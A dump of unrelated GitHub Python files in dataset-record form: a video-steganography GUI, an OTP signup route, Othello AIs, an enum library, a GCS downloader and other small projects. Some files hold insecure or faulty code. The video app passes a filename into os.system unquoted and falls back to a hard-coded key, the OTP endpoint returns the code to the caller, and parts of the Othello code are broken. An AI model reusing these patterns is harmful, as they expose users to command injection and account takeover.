\"./tmp/\"\n progress['value'] = 40\n root.update_idletasks()\n for i in range(len(os.listdir(tmp))):\n f_name = \"{}{}.png\".format(tmp, i)\n # print(\"[INFO] Decoding frame {}\", f_name)\n secret_dec = lsb.reveal(f_name)\n # print(\"[INFO] Got {} from frame {}\", secret_dec, f_name)\n if secret_dec is None:\n break\n secret.append(secret_dec)\n video_data = ''.join([i for i in secret]) #making paragraph of list item\n progress['value'] = 80\n root.update_idletasks()\n clean_tmp()\n print(\"video_decoding start done\")\n string_to_rgb(video_data)\n progress.destroy()\n\n\ndef string_to_rgb(bstr):\n print(\"stringToRGB\")\n b_bstr = bstr[2:]\n #b_bstr = bstr\n x = base64.b64decode(b_bstr)\n fin = open(\"sample.enc\", \"wb\") #recive file\n fin.write(x)\n fin.close()\n #converting decryption resuffle\n if e4.get() != '':\n key = e4.get()\n else:\n key = 'python'\n print(\"[info] key\", key)\n ed.decryption_with_aes(\"sample.enc\",ed.SALT,\"sample.png\",key)\n ed.pixelchange(\"sample.png\")\n print(\"image file save as sample.png\")\n global img_path\n img_path = \"sample.png\"\n Image.open(\"sample.png\").show()\n print(\"stringToRGB done\")\n copy_to_desktop(\"sample.png\")\n\n\n# play button\ndef play_btn():\n if video_path == '':\n print(\"file not found\")\n else:\n print(\"file is:\", video_path)\n play_video(video_path)\n\n\ndef copy_to_desktop(file_name):\n desktop = os.path.join(os.path.join(os.path.expanduser('~')), 'Desktop')\n shutil.copy(file_name, desktop)\n\n\n# play a video using vlc\ndef play_video(video_name):\n try:\n print(\"|cmd| 'vlc' \", video_name)\n x = os.system('vlc \"%s\"' % video_name)\n if x != 0:\n messagebox.showerror(\"Req:\", \"install vlc player\")\n except:\n print(\"error:No media player found\")\n\n\ndef encrypt_message():\n progress = Progressbar(root, orient=HORIZONTAL, length=100, mode='determinate')\n progress.grid(row=9, column=1, columnspan=4)\n print(\"|Encrypt| method invoke\")\n f_name = video_path\n\n input_string = e2.get()\n progress['value'] = 20\n root.update_idletasks()\n frame_extraction(f_name)\n progress['value'] = 30\n root.update_idletasks()\n call([\"ffmpeg\", \"-i\", f_name, \"-q:a\", \"0\", \"-map\", \"a\", \"tmp/audio.mp3\", \"-y\"], stdout=open(os.devnull, \"w\"),\n stderr=STDOUT),\n progress['value'] = 40\n root.update_idletasks()\n encode_string(input_string)\n progress['value'] = 50\n root.update_idletasks()\n call([\"ffmpeg\", \"-i\", \"tmp/%d.png\", \"-vcodec\", \"png\", \"tmp/video.mov\", \"-y\"], stdout=open(os.devnull, \"w\"),\n stderr=STDOUT)\n progress['value'] = 60\n root.update_idletasks()\n call([\"ffmpeg\", \"-i\", \"tmp/video.mov\", \"-i\", \"tmp/audio.mp3\", \"-codec\", \"copy\", \"video.mp4\", \"-y\"],\n stdout=open(os.devnull, \"w\"), stderr=STDOUT)\n progress['value'] = 70\n root.update_idletasks()\n # desktop = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')\n # shutil.copy(\"video.mp4\", desktop)\n desktop = os.path.join(os.path.join(os.path.expanduser('~')), 'Desktop')\n progress['value'] = 80\n root.update_idletasks()\n shutil.copy(\"video.mp4\", desktop)\n print(\"|Info| Done....\")\n progress['value'] = 100\n root.update_idletasks()\n clean_tmp()\n progress.destroy()\n\n\ndef decrypt_message():\n decode_string(video_path)\n\n\ndef clean_ui():\n print('[info] cleaning ui:')\n e1.delete('0', \"end\")\n e2.delete('0', \"end\")\n e3.delete('0', \"end\")\n e4.delete('0', \"end\")\n c_box.set('select')\n global video_path\n video_path = ''\n global img_path\n img_path = ''\n\n\ndef 
go_button():\n print(\"go_button invoke\")\n print('[info] checkbox1', c_box.get())\n print('[info] video name:', video_path)\n print('[info] msg:', e2.get())\n print('[info] image name:', img_path)\n if e1.get() == '':\n messagebox.showerror(\"Error\", \"Video is not selected\")\n if c_box.get() == 'Encrypt_Message':\n if e2.get() == '':\n messagebox.showwarning(\"Warning\", \"put some message in message box.\")\n else:\n encrypt_message()\n elif c_box.get() == 'Decrypt_Message':\n decrypt_message()\n elif c_box.get() == 'Encrypt_Image':\n if e3.get() == '':\n messagebox.showwarning(\"Warning\", \"select an image first.\")\n else:\n encode_image_into_video()\n elif c_box.get() == 'Decrypt_Image':\n decode_image_form_video()\n else:\n print(\"select an operation\")\n messagebox.showwarning(\"Warning\", \"select an operation first\")\n\n\ndef show_image():\n print(\"show image invoke:\")\n if img_path == '':\n print(\"file not found\")\n else:\n Image.open(img_path).show()\n\n\n# creating entries and positioning them on the grid\ne1 = Entry(root)\ne1.grid(row=10, column=2)\ne2 = Entry(root)\ne2.grid(row=11, column=2)\ne3 = Entry(root)\ne3.grid(row=14, column=2)\ne4 = Entry(root) #for key Default:python\ne4.insert(0,'python')\ne4.grid(row=13, column=2)\n# creating labels and positioning them on the grid\nlabel_1 = Label(root, bg=\"dark slate gray\", fg=\"white\", text='Video path')\nlabel_1.grid(row=10, column=1)\nlabel_2 = Label(root, bg=\"dark slate gray\", fg=\"white\", text='Plain text')\nlabel_2.grid(row=11, column=1)\nlabel_2 = Label(root, bg=\"dark slate gray\", fg=\"white\", text='Key')\nlabel_2.grid(row=13, column=1)\nlabel_3 = Label(root, bg=\"dark slate gray\", fg=\"white\", text=\"Operation :\").grid(column=1, row=12, padx=10, pady=10)\nlabel_4 = Label(root, bg=\"dark slate gray\", fg=\"white\", text=\"Image path\").grid(column=1, row=14, padx=10, pady=10)\n\n# creating checkbox and positioning them on the grid\nc_box = ttk.Combobox(root)\nc_box['values'] = ('Encrypt_Message', 'Decrypt_Message', 'Encrypt_Image', 'Decrypt_Image')\nc_box.grid(row=12, column=2, )\nc_box.set('select')\n\n# creating Buttons and positioning them on the grid\nb1 = Button(root, text='Browse', bg=\"teal\", fg=\"white\", command=lambda: open_file())\nb1.grid(row=10, column=3, padx=10, pady=10)\nb2 = Button(root, text=\"play video\", bg=\"teal\", fg=\"white\", command=play_btn)\nb2.grid(row=13, column=3, padx=10, pady=10)\nb3 = Button(root, text=\"load\", bg=\"teal\", fg=\"white\", command=open_file_for_image)\nb3.grid(row=14, column=3, padx=10, pady=10)\nb4 = Button(root, text=\"Go\", bg=\"teal\", fg=\"white\", command=go_button)\nb4.grid(row=15, column=3, padx=10, pady=10)\nb3 = Button(root, text=\"clear\", bg=\"teal\", fg=\"white\", command=clean_ui)\nb3.grid(row=15, column=1, padx=10, pady=10)\nb5 = Button(root, text=\"View Image\", bg=\"teal\", fg=\"white\", command=show_image)\nb5.grid(row=15, column=2, padx=10, pady=10)\n\nroot.mainloop()\n","repo_name":"shadan1997/Video-Steganography-desktop-based-application-using-python-UI","sub_path":"vw.py","file_name":"vw.py","file_ext":"py","file_size_in_byte":13187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25082340915","text":"def merge_outbound_with_inbound(id_list, adj):\n output_list = []\n for outbound in id_list['out']:\n for inbound in id_list['in']:\n current_list = []\n last_sector_of_current_outbound = outbound[-1]\n first_sector_of_current_inbound = inbound[0]\n if 
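go_button above selects an operation with an if/elif chain over the combobox value. A dispatch-table sketch of the same routing (handler names echo the record, bodies here are stubs):

def encrypt_message(): print("encrypting message")
def decrypt_message(): print("decrypting message")
def encode_image_into_video(): print("encoding image")
def decode_image_form_video(): print("decoding image")

OPERATIONS = {
    "Encrypt_Message": encrypt_message,
    "Decrypt_Message": decrypt_message,
    "Encrypt_Image": encode_image_into_video,
    "Decrypt_Image": decode_image_form_video,
}

def dispatch(choice):
    OPERATIONS.get(choice, lambda: print("select an operation first"))()

dispatch("Decrypt_Image")  # decoding image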
first_sector_of_current_inbound in adj[last_sector_of_current_outbound]:\n for number_1 in outbound:\n current_list.append(number_1)\n for number_2 in inbound:\n current_list.append(number_2)\n output_list.append(current_list[:])\n return output_list\n","repo_name":"astro-tech/kiwicom-task","sub_path":"merge_return.py","file_name":"merge_return.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8765782929","text":"from unittest import result\nfrom fastapi.routing import APIRouter\nfrom routers.config import engine\nfrom routers import Response\nimport ast,json\nimport schemas\nfrom routers.services.mail import sendEmail\nfrom routers.services.sms import sendSMS\nfrom random import randint\n\nrouter=APIRouter(prefix='/signupOtp',tags=['signupOtp'])\n\n@router.post('')\ndef signupOtp(request:schemas.signupOtp):\n try:\n with engine.connect()as cur:\n OTP = randint(1000, 9999)\n result=cur.execute(f\"\"\"EXEC [dbo].[signupOtp] ?\"\"\",(request.username)) \n rows=result.fetchall()\n result.close()\n if rows[0][0]!=0:\n sample=json.loads(rows[0][2])\n for i in sample:\n if i[\"templateType\"]=='M' and rows[0][1]!=None:\n Message_str = i[\"messageBody\"].replace(\n '[customerName]',str(request.username)).replace('[OTP Number]',str(OTP))\n Data={\"subject\":i[\"subject\"],\"contact\":rows[0][1],\"mail_content\":Message_str}\n sendEmail(Data) \n # elif i[\"templateType\"]=='S' and rows[0][1]!=None:\n # sendSMS(\"smart-parking\",rows[0][1],i[\"messageBody\"],i[\"peid\"],i[\"tpid\"])\n return {\"statusCode\": 1, \"response\": \"OTP sent Successfully!\",'OTP':OTP} \n else:\n return {\"statusCode\":rows[0][0], \"response\": rows[0][1]} \n \n except Exception as e:\n print(\"Exception Error\",str(e))\n return {\"statusCode\":0,\"response\":\"Server Error\"}","repo_name":"chinnies350/smartparkingdev","sub_path":"routers/signupOtp.py","file_name":"signupOtp.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40726945139","text":"import copy\nimport random\nimport numpy as np\n\nimport osero\n\ncell = osero.cell\nvec = osero.vec\n\nblank = osero.blank\nblack = osero.black\nwhite = osero.white\n\nif osero.player_white[1] == \"cnw\" or osero.player_black[1] == \"cnw\":\n from tensorflow import keras\n import numpy as np\n if osero.player_white[1] == \"cnw\":\n model_white = keras.models.load_model(osero.player_white[2])\n if osero.player_black[1] == \"cnw\":\n model_black = keras.models.load_model(osero.player_black[2])\n\ndef cpu(board):\n max_deep = 3\n deep = 0\n for i in range(cell):\n for j in range(cell):\n if board[i][j] == 2:\n put_able_list.pop([i, j])\n x = put_able_list[0][0]\n y = put_able_list[0][1]\n for i in put_able_list:\n dfs = []\n\ndef cpu_weak(board_org, turn):\n board = copy.deepcopy(board_org)\n put_able_list = []\n for i in range(cell):\n for j in range(cell):\n if board[i][j] == 2:\n put_able_list.append([i, j])\n put_able_cnt_min = 64\n for li in put_able_list:\n board = copy.deepcopy(board_org)\n board_after = osero.convert(li[0], li[1], turn, board)\n put_able_cnt, tmp = osero.put_able_check(turn * -1, board)\n print(li, put_able_cnt)\n if put_able_cnt_min > put_able_cnt:\n put_list = [li]\n put_able_cnt_min = put_able_cnt\n elif put_able_cnt_min == put_able_cnt:\n put_list.append(li)\n \n tmp = random.randint(0, len(put_list)-1)\n x = put_list[tmp][0]\n y = 
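The route-merging function that ends above pairs every outbound itinerary with every inbound one, keeping a pair only when the inbound's first sector is adjacent to the outbound's last sector. An equivalent comprehension with toy data:

def merge_routes(id_list, adj):
    return [out + inn
            for out in id_list["out"]
            for inn in id_list["in"]
            if inn[0] in adj[out[-1]]]

routes = {"out": [[1, 2]], "in": [[3, 4], [5]]}
print(merge_routes(routes, {2: {3, 5}}))  # [[1, 2, 3, 4], [1, 2, 5]]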
put_list[tmp][1]\n\n print(\"put\", x, y)\n return x, y\n\ndef cpu_weak_forbid(board_org, turn):\n forbid_grid = [[0,1],[1,0],[1,1],[0,6],[1,6],[1,7],[6,0],[6,1],[7,1],[6,6],[6,7],[7,6]]\n\n board = copy.deepcopy(board_org)\n put_able_list = []\n for i in range(cell):\n for j in range(cell):\n if board[i][j] == 2:\n put_able_list.append([i, j])\n put_able_cnt_min = 64\n for li in put_able_list:\n board = copy.deepcopy(board_org)\n board = osero.convert(li[0], li[1], turn, board)\n put_able_cnt, tmp = osero.put_able_check(turn * -1, board)\n if li in forbid_grid:\n put_able_cnt += 10\n print(li, put_able_cnt)\n if put_able_cnt_min > put_able_cnt:\n put_list = [li]\n put_able_cnt_min = put_able_cnt\n elif put_able_cnt_min == put_able_cnt:\n put_list.append(li)\n\n tmp = random.randint(0, len(put_list)-1)\n x = put_list[tmp][0]\n y = put_list[tmp][1]\n\n print(\"put\", x, y)\n return x, y\n\ndef cpu_table(board_org, turn):\n board = copy.deepcopy(board_org)\n put_able_list = []\n for i in range(cell):\n for j in range(cell):\n if board[i][j] == 2:\n put_able_list.append([i, j])\n put_able_cnt_min = 64\n table = np.load(\"black_table.npy\")\n alpha = 1\n for li in put_able_list:\n score = 0\n board = copy.deepcopy(board_org)\n board = osero.convert(li[0], li[1], turn, board)\n put_able_cnt, tmp = osero.put_able_check(turn * -1, board)\n score = alpha * table[li[0]][li[1]] - put_able_cnt\n print(li, score)\n if put_able_cnt_min > put_able_cnt:\n put_list = [li]\n put_able_cnt_min = put_able_cnt\n elif put_able_cnt_min == put_able_cnt:\n put_list.append(li)\n\n tmp = random.randint(0, len(put_list)-1)\n x = put_list[tmp][0]\n y = put_list[tmp][1]\n\n print(\"put\", x, y)\n return x, y\n\ndef cpu_deep(board_org, turn, deep_max = 5):\n def get_put_list(board, deep):\n put_able_list = []\n for i in range(cell):\n for j in range(cell):\n if board[i][j] == 2:\n put_able_list.append([i, j, deep, copy.deepcopy(board)])\n return put_able_list\n\n forbid_grid = [[0,1],[1,0],[1,1],[0,6],[1,6],[1,7],[6,0],[6,1],[7,1],[6,6],[6,7],[7,6]]\n\n board = copy.deepcopy(board_org)\n put_able_list = get_put_list(board, 0)\n put_able_cnt_min = 64\n for li in put_able_list:\n score = 0\n deep = 0\n board = copy.deepcopy(board_org)\n\n dfs = [[li[0], li[1], deep, board]]\n while dfs != []:\n tmp = dfs.pop(0)\n deep = tmp[2]\n if deep > deep_max:\n continue\n board = tmp[3]\n\n board = osero.convert(tmp[0], tmp[1], turn * (-1)**deep, board)\n deep += 1\n put_able_cnt, board = osero.put_able_check(turn * (-1)**deep, board)\n if turn * (-1)**deep == turn:\n score -= put_able_cnt\n else:\n score += put_able_cnt\n dfs = dfs + get_put_list(board, deep)\n if [tmp[0], tmp[1]] in forbid_grid:\n score += 10\n \n print(li[:2], put_able_cnt)\n if li[:2] in forbid_grid:\n score += 10\n if put_able_cnt_min > put_able_cnt:\n put_list = [li]\n put_able_cnt_min = put_able_cnt\n elif put_able_cnt_min == put_able_cnt:\n put_list.append(li)\n\n tmp = random.randint(0, len(put_list)-1)\n x = put_list[tmp][0]\n y = put_list[tmp][1]\n\n print(\"put\", x, y)\n return x, y\n\nclass cnw():\n def predict(board, turn):\n black_board = [[0 for _ in range(cell)]for _ in range(cell)]\n white_board = [[0 for _ in range(cell)]for _ in range(cell)]\n\n for i in range(cell):\n for j in range(cell):\n num = board[i][j]\n if num == white:\n white_board[i][j] = 1\n if num == black:\n black_board[i][j] = 1\n if turn == white:\n my_data = white_board\n enemy_data = black_board\n else :\n my_data = black_board\n enemy_data = white_board\n board_data = 
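cpu_weak above implements a mobility heuristic: play the move that leaves the opponent the fewest legal replies, breaking ties at random. A board-agnostic sketch of that selection rule (the moves and reply counts are toy stand-ins for the osero helpers):

import random

def pick_move(moves, count_replies):
    """Return a random move among those minimising opponent mobility."""
    best = min(count_replies(m) for m in moves)
    return random.choice([m for m in moves if count_replies(m) == best])

replies = {(2, 3): 4, (5, 4): 2, (4, 5): 2}
print(pick_move(list(replies), replies.get))  # (5, 4) or (4, 5)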
np.array([[my_data, enemy_data]], dtype=np.int8)\n\n if turn == white:\n pre = model_white.predict(board_data)\n else :\n pre = model_black.predict(board_data)\n num = np.argmax(pre)\n li = []\n for i in range(cell):\n for j in range(cell):\n li.append([i, j])\n x = li[num][0]\n y = li[num][1]\n print(\"put \",x, y, num)\n return x, y\n\n\ndef cpu_random(board):\n put_able_list = []\n for i in range(cell):\n for j in range(cell):\n if board[i][j] == 2:\n put_able_list.append([i, j])\n if len(put_able_list) == 0:\n return \n else:\n tmp = random.randint(0, len(put_able_list)-1)\n return put_able_list[tmp][0], put_able_list[tmp][1]\n\n\n","repo_name":"SokiGoto/osero","sub_path":"cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":6627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18314451722","text":"import textwrap\nfrom operator import attrgetter\nfrom warnings import warn\n\nfrom fusion_util.errors import InvalidEnumItem\n\n\n\nclass Enum(object):\n \"\"\"\n An enumeration.\n\n `Enum` objects implement the iterator protocol.\n\n :type _order: ``List[`EnumItem`]``\n :ivar _order: Enumeration items in the original order of the definition.\n\n :type _values: ``Mapping[object, `EnumItem`]``\n :ivar _values: A mapping of enumeration values to `EnumItem`s\n \"\"\"\n def __init__(self, doc, values, value_key=attrgetter('value')):\n \"\"\"\n :param str doc: Brief documentation of the enumeration.\n :type values: ``List[`EnumItem`]``\n :param values: List of enumeration items.\n :type value_key: ``Callable[[`EnumItem`], unicode]``\n :param value_key: Function to produce the key to use when constructing\n a mapping for each item in ``values``.\n \"\"\"\n self.doc = doc\n _order = self._order = []\n _values = self._values = {}\n for value in values:\n key = value_key(value)\n if key in _values:\n raise ValueError(\n '{!r} is already a value in the enumeration'.format(key))\n _order.append(value)\n _values[key] = value\n\n\n def __iter__(self):\n for item in self._order:\n if not item.hidden:\n yield item\n\n\n def __repr__(self):\n lines = textwrap.wrap(textwrap.dedent(self.doc.strip()))\n line = 'undocumented'\n if lines:\n line = lines[0]\n if len(lines) > 1:\n line += '...'\n line = '\"\"\"{}\"\"\"'.format(line)\n return '<{} {}>'.format(\n type(self).__name__,\n line)\n\n\n def __eq__(self, other):\n if isinstance(other, Enum):\n return (other.doc == self.doc and\n self._order == other._order)\n return NotImplemented\n\n\n @classmethod\n def from_pairs(cls, doc, pairs):\n \"\"\"\n Construct an enumeration from an iterable of pairs.\n\n :param doc: See `Enum.__init__`.\n :type pairs: ``Iterable[Tuple[unicode, unicode]]``\n :param pairs: Iterable to construct the enumeration from.\n :rtype: Enum\n \"\"\"\n values = (EnumItem(value, desc) for value, desc in pairs)\n return cls(doc=doc, values=values)\n\n\n @classmethod\n def fromPairs(cls, doc, pairs):\n warn('Enum.fromPairs is deprecated, use Enum.from_pairs',\n DeprecationWarning, 2)\n return cls.from_pairs(doc, pairs)\n\n\n def get(self, value):\n \"\"\"\n Get an enumeration item for an enumeration value.\n\n :param unicode value: Enumeration value.\n :raise InvalidEnumItem: If ``value`` does not match any known\n enumeration value.\n :rtype: EnumItem\n \"\"\"\n _nothing = object()\n item = self._values.get(value, _nothing)\n if item is _nothing:\n raise InvalidEnumItem(value)\n return item\n\n\n def desc(self, value):\n \"\"\"\n Get the enumeration item description 
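cnw.predict above builds a 64-entry coordinate list just to translate np.argmax into (x, y); divmod performs the same translation directly. A minimal sketch:

import numpy as np

cell = 8
pre = np.zeros(cell * cell)
pre[19] = 1.0                        # pretend the network chose index 19
x, y = divmod(int(np.argmax(pre)), cell)
print(x, y)                          # 2 3, matching the list lookup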
for an enumeration value.\n\n :param unicode value: Enumeration value.\n \"\"\"\n try:\n return self.get(value).desc\n except InvalidEnumItem:\n return u''\n\n\n def getDesc(self, value):\n warn('Enum.getDesc is deprecated, use Enum.desc',\n DeprecationWarning, 2)\n return self.desc(value)\n\n\n def extra(self, value, extra_name, default=None):\n \"\"\"\n Get the additional enumeration value for ``extra_name``.\n\n :param unicode value: Enumeration value.\n :param str extra_name: Extra name.\n :param default: Default value in the case ``extra_name`` doesn't exist.\n \"\"\"\n try:\n return self.get(value).get(extra_name, default)\n except InvalidEnumItem:\n return default\n\n\n def getExtra(self, value, extraName, default=None):\n warn('Enum.getExtra is deprecated, use Enum.extra',\n DeprecationWarning, 2)\n return self.extra(value, extraName, default)\n\n\n def find(self, **names):\n \"\"\"\n Find the first item with matching extra values.\n\n :param \\*\\*names: Extra values to match.\n :rtype: `EnumItem`\n :return: First matching item or ``None``.\n \"\"\"\n for res in self.find_all(**names):\n return res\n return None\n\n\n def find_all(self, **names):\n \"\"\"\n Find all items with matching extra values.\n\n :param \\*\\*names: Extra values to match.\n :rtype: ``Iterable[`EnumItem`]``\n \"\"\"\n values = names.items()\n if len(values) != 1:\n raise ValueError('Only one query is allowed at a time')\n name, value = values[0]\n for item in self:\n if item.get(name) == value:\n yield item\n\n\n def findAll(self, **names):\n warn('Enum.findAll is deprecated, use Enum.find_all',\n DeprecationWarning, 2)\n return self.find_all(**names)\n\n\n def as_pairs(self):\n \"\"\"\n Transform the enumeration into a sequence of pairs.\n\n :rtype: ``List[Tuple[unicode, unicode]]``\n :return: List of enumeration value and description pairs.\n \"\"\"\n return [(i.value, i.desc) for i in self]\n\n\n def asPairs(self):\n warn('Enum.asPairs is deprecated, use Enum.as_pairs',\n DeprecationWarning, 2)\n return self.as_pairs()\n\n\n\nclass ObjectEnum(Enum):\n \"\"\"\n An enumeration for arbitrary Python objects.\n\n Pass the Python object as the `value` parameter to `EnumItem`, `ObjectEnum`\n will automatically create an ``id`` extra value for `EnumItem`\\s that do\n not already have such a value.\n \"\"\"\n def __init__(self, doc, values):\n def value_key(value):\n key = unicode(id(value.value))\n if value.get('id') is None:\n value._extra['id'] = key\n return key\n super(ObjectEnum, self).__init__(\n doc=doc, values=values, value_key=value_key)\n\n\n def get(self, value):\n value = unicode(id(value))\n return super(ObjectEnum, self).get(value)\n\n\n def as_pairs(self):\n return [(i.id, i.desc)\n for i in self]\n\n\n\nclass EnumItem(object):\n \"\"\"\n An enumeration item contained by `Enum`.\n\n :ivar value: Enumeration value.\n :ivar unicode desc: Brief textual description of the enumeration item.\n :ivar bool hidden: Is this enumeration item hidden?\n :type _extra: ``Mapping[str, object]``\n :ivar _extra: Mapping of names to additional enumeration values.\n \"\"\"\n def __init__(self, value, desc, hidden=False, **extra):\n \"\"\"\n Initialise an enumeration item.\n\n :param value: See `EnumItem.value`.\n :param desc: See `EnumItem.desc`.\n :param hidden: See `EnumItem.hidden`.\n :param \\*\\*extra: Additional extra values, accessed via `EnumItem.get`.\n \"\"\"\n self.value = value\n self.desc = desc\n self.hidden = hidden\n self._extra = extra\n\n\n def __repr__(self):\n return '<{} value={!r} desc={!r} 
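A usage sketch for the Enum/EnumItem API defined above. Note the record is Python 2-era code (it uses unicode and warn-based deprecation shims); the snippet assumes the classes are importable from the record's fusion_util.enums path.

from fusion_util.enums import Enum, EnumItem  # assumed install/path

colors = Enum(u"Traffic light colours.", [
    EnumItem(u"red", u"Stop"),
    EnumItem(u"amber", u"Caution", hidden=True),
    EnumItem(u"green", u"Go", rank=1),
])
print(colors.get(u"red").desc)          # Stop
print(colors.extra(u"green", "rank"))   # 1
print(colors.as_pairs())                # hidden items are excluded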
hidden={}>'.format(\n type(self).__name__,\n self.value,\n self.desc,\n self.hidden)\n\n\n def __eq__(self, other):\n if isinstance(other, EnumItem):\n return (self.value == other.value and\n self.desc == other.desc and\n self.hidden == other.hidden and\n self._extra == other._extra)\n return NotImplemented\n\n\n def __getattr__(self, name):\n \"\"\"\n Get an extra value by name.\n \"\"\"\n warn('Attribute access on EnumItem is deprecated, use EnumItem.get',\n DeprecationWarning, 2)\n if name in self._extra:\n return self.get(name)\n raise AttributeError(\n '{!r} object has no attribute {!r}'.format(\n type(self).__name__, name))\n\n\n def get(self, name, default=None):\n \"\"\"\n Get the value of an extra parameter.\n\n :param str name: Extra parameter name.\n :param default: Default value in the case ``name`` doesn't exist.\n \"\"\"\n return self._extra.get(name, default)\n\n\n def items(self):\n \"\"\"\n Additional enumeration values.\n\n :rtype: ``Iterable[Tuple[str, object]]``\n \"\"\"\n return self._extra.items()\n\n\n\ndef filter_enum(pred, enum):\n \"\"\"\n Create a new enumeration containing only items filtered from another\n enumeration.\n\n Hidden enum items in the original enumeration are excluded.\n\n :type pred: ``Callable[[`EnumItem`], bool]``\n :param pred: Predicate that will keep items for which the result is true.\n :type enum: Enum\n :param enum: Enumeration to filter.\n :rtype: Enum\n :return: New filtered enumeration.\n \"\"\"\n def _items():\n for item in enum:\n yield EnumItem(\n item.value,\n item.desc,\n not pred(item),\n **item._extra)\n return Enum('Filtered from {!r}'.format(enum), list(_items()))\n","repo_name":"fusionapp/fusion-util","sub_path":"fusion_util/enums.py","file_name":"enums.py","file_ext":"py","file_size_in_byte":9159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39481733537","text":"from google.cloud import storage\nfrom itertools import repeat\nimport concurrent.futures\nimport time\n\n\ndef list_blobs_with_prefix(bucket_name: str,\n prefix: str, \n delimiter: str = None):\n storage_client = storage.Client()\n blobs = storage_client.list_blobs(bucket_name, prefix=prefix, delimiter=delimiter)\n\n return [blob.name for blob in blobs]\n\ndef download_blob(bucket_name: str, \n source_blob_name: str, \n destination_file_name: str):\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n blob.download_to_filename(destination_file_name)\n\n return (\n \"Downloaded storage object {} from bucket {} to local file {}.\".format(\n source_blob_name, bucket_name, destination_file_name\n )\n )\n\n\n# Information needed to download the objects\nbucket_name = 'renatoleite-criteo-partial'\nprefix = ''\ndelimiter = None\nblobs = list_blobs_with_prefix(bucket_name, prefix, delimiter)\n\n# Destination folder\ndest_folder = '/home/renatoleite/data/'\ndest_files = [dest_folder + blob.split(sep='/')[-1] for blob in blobs]\n\nstart_time = time.perf_counter()\n\nwith concurrent.futures.ThreadPoolExecutor() as executor:\n executor.map(download_blob, \n repeat(bucket_name), \n blobs, \n dest_files)\n\nend_time = time.perf_counter()\n\nprint(f'Finished in {end_time-start_time} seconds.')","repo_name":"js-ts/rl-merlin","sub_path":"benchmark_vertex_copy_gcs/gcs_api_copy.py","file_name":"gcs_api_copy.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} 
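The downloader that closes above constructs a fresh storage.Client inside every download_blob call; a single client is commonly shared across download threads, which skips repeated credential setup. A sketch of that variant (bucket name and destination are illustrative):

from concurrent.futures import ThreadPoolExecutor
from google.cloud import storage

def download_all(bucket_name, blob_names, dest_folder):
    bucket = storage.Client().bucket(bucket_name)  # one client for all threads
    def fetch(name):
        dest = dest_folder + name.split("/")[-1]
        bucket.blob(name).download_to_filename(dest)
        return dest
    with ThreadPoolExecutor() as pool:
        return list(pool.map(fetch, blob_names))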
+{"seq_id":"31757836852","text":"import statistics\n\ndef p1(s: str):\n nums = [int(n) for n in s.replace(\"\\n\", \"\").split(\",\")]\n alignment = statistics.median(nums)\n return sum([abs(i - alignment) for i in nums])\n\n\ndef p2(s: str):\n nums = [int(n) for n in s.replace(\"\\n\", \"\").split(\",\")]\n alignment = int(statistics.mean(nums))\n return min(\n sum(abs(i - a) * (abs(i - a) + 1) / 2 for i in nums)\n for a in [alignment, alignment + 1]\n )\n \ninput = \"16,1,2,0,4,2,7,1,2,14\"\nprint(p1(input))\nprint(p2(input))","repo_name":"EliasMera/AdventOfCode2021","sub_path":"Day7.py","file_name":"Day7.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6024089106","text":"import pyttsx3\nimport wikipedia\n\n\ndef search_wikipedia():\n try:\n voice = pyttsx3.init()\n search_query = input(\"Searching wikipedia/google: \")\n result = wikipedia.summary(search_query)\n print(result)\n voice.say(result)\n voice.runAndWait()\n except wikipedia.exceptions.DisambiguationError as e:\n print(\"Please provide a more specific search query.\")\n except wikipedia.exceptions.PageError as e:\n print(\"The page you requested does not exist.\")\n except Exception as e:\n print(\"An error occurred while searching Wikipedia.\")\n\n\nsearch_wikipedia()\n","repo_name":"ashalupreti/Wikipedia-Voice-Assistant","sub_path":"Wikipedia Voice Assistant.py","file_name":"Wikipedia Voice Assistant.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72773614188","text":"import torch\nimport torch.nn as nn\n\nclass Actor(nn.Module):\n def __init__(self, n_states):\n super(Actor, self).__init__()\n self.net = nn.Sequential(\n nn.Linear(n_states, 20), \n nn.ReLU(), \n nn.Linear(20, 20), \n nn.ReLU(), \n nn.Linear(20, 20), \n nn.ReLU(), \n nn.Linear(20, 1)\n )\n \n def forward(self, state):\n return self.net(state)\n\nclass Critic(nn.Module):\n def __init__(self, n_states, n_actions):\n super(Critic, self).__init__()\n self.net = nn.Sequential(\n nn.Linear(n_states + n_actions, 20), \n nn.ReLU(), \n nn.Linear(20, 20), \n nn.ReLU(), \n nn.Linear(20, 20), \n nn.ReLU(), \n nn.Linear(20, n_actions)\n )\n \n def forward(self, state, action):\n return self.net(torch.cat((state, action), 1))","repo_name":"greatwallet/mountain-car","sub_path":"DDPG.py","file_name":"DDPG.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"36770659920","text":"from flask import Flask, request, session\nfrom flask_restx import Resource, Api, fields, Namespace\nfrom model.ConnecsiModel import ConnecsiModel\nfrom passlib.hash import sha256_crypt\nimport datetime\nfrom controller.youtube.YoutubeApiController import YoutubeApiController\nimport requests\n\nns_youtube = Namespace('Youtube', description='Youtube Apis')\n\nsearch_channels_form = ns_youtube.model('Search Channels', {\n 'category_id' : fields.String(required=False, description='Category ID'),\n 'country' : fields.String(required=False, description='Country'),\n 'min_lower' : fields.Integer(required=False, description='Min Followers'),\n 'max_upper' : fields.Integer(required=False, description='Max Followers'),\n 